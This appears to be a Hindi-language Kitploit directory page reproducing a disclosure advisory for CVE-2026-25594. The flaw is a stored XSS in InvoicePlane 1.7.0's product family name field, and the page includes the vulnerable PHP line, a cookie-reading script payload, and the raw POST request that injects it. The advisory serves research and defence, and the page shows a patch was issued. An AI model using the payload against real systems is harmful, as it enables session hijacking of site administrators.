Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-25594 — # InvoicePlane 1.7.0 के लिए संग्रहीत XSS प्रमाण-अवधारणा, परिवार नाम फ़ील्ड के माध्यम से, जिसमें पेलोड, अनुरोध, और रक्षात्मक अनुसंधान के लिए प्रभाव विश्लेषण शामिल है। | Kitploit
उपकरण/GitHubGitHub/lagathos/cve-2026-25594
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षालर्निंग और शिक्षा
GitHublagathos/cve-2026-25594

CVE-2026-25594

# InvoicePlane 1.7.0 के लिए संग्रहीत XSS प्रमाण-अवधारणा, परिवार नाम फ़ील्ड के माध्यम से, जिसमें पेलोड, अनुरोध, और रक्षात्मक अनुसंधान के लिए प्रभाव विश्लेषण शामिल है।

रिपॉजिटरी देखें
36 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-25594 — InvoicePlane 1.7.0 में फैमिली नाम के माध्यम से स्टोर्ड XSS

भेद्यता: फैमिली नाम फ़ील्ड के माध्यम से स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS)

उत्पाद: InvoicePlane

प्रभावित संस्करण: 1.7.0 (और संभवतः पिछले संस्करण)

गंभीरता: मध्यम

CVSS 3.1 स्कोर: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: वेब पेज जनरेशन के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन

खोजकर्ता: Leonidas Agathos

रिपोर्ट दिनांक: 2026-01-31


विवरण

प्रोडक्ट फैमिली फॉर्म (/index.php/families/form) में family_name फ़ील्ड बिना सैनिटाइज़ेशन के मनमाना इनपुट स्वीकार करता है। मान डेटाबेस में संग्रहीत किया जाता है और बाद में प्रोडक्ट निर्माण/संपादन पृष्ठ के फैमिली ड्रॉपडाउन में बिना एन्कोडिंग के प्रस्तुत किया जाता है, जिससे किसी भी एडमिन द्वारा प्रोडक्ट फॉर्म पर जाने पर JavaScript निष्पादित होती है।

भेद्य फ़ाइल: application/modules/products/views/form.php:40

root@kitploit:~
// Line 40
><?php echo $family->family_name; ?></option>

प्रूफ ऑफ कॉन्सेप्ट

चरण 1 — फैमिली नाम में पेलोड इंजेक्ट करें

/index.php/families/form पर जाएं और फैमिली नाम के रूप में निम्नलिखित सबमिट करें:

root@kitploit:~
<script>alert('domain:'+document.domain+'cookies:'+document.cookie)</script>

अनुरोध:

root@kitploit:~
POST /index.php/families/form HTTP/1.1
Host: 172.25.0.12
Content-Type: application/x-www-form-urlencoded

_ip_csrf=...&btn_submit=1&is_update=0&family_name=%3Cscript%3Ealert%28document.cookies%29%3C%2Fscript%3E

चरण 1 - Burp Suite के माध्यम से फैमिली नाम फ़ील्ड में XSS पेलोड इंजेक्ट करना

चरण 2 — XSS ट्रिगर करें

/index.php/products/form पर जाएं। फैमिली ड्रॉपडाउन प्रस्तुत होने पर पेलोड सक्रिय हो जाता है।

चरण 2 - प्रोडक्ट फॉर्म पृष्ठ पर XSS निष्पादित हो रहा है, डोमेन और कुकीज़ लीक हो रही हैं


प्रभाव

प्रोडक्ट निर्माण या संपादन पृष्ठ पर जाने वाला कोई भी एडमिन अपने ब्राउज़र में पेलोड निष्पादित करवाएगा। यह सत्र अपहरण (यदि कुकीज़ HttpOnly नहीं हैं), CSRF टोकन चोरी, और पीड़ित की पहचान के तहत किए गए कार्यों को सक्षम बनाता है।


समयरेखा

दिनांकघटना
2026-01-30भेद्यता की खोज
2026-01-31प्रूफ ऑफ कॉन्सेप्ट विकसित किया गया
2026-01-31विक्रेता को सूचित किया गया
2026-02-04विक्रेता की स्वीकृति
2026-02-04पैच जारी किया गया
2026-02-05सार्वजनिक प्रकटीकरण

संदर्भ

  • CWE-79
  • OWASP: क्रॉस-साइट स्क्रिप्टिंग (XSS)
  • CVE-2026-25594

अस्वीकरण

यह भेद्यता स्वतंत्र सुरक्षा अनुसंधान के दौरान खोजी गई थी। सभी जानकारी केवल शैक्षिक, अनुसंधान और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है ताकि विक्रेता और सुरक्षा समुदाय को इस मुद्दे को समझने और ठीक करने में सहायता मिल सके। इस जानकारी का कोई भी दुर्भावनापूर्ण उपयोग सख्त वर्जित है।

टूल डाउनलोड करें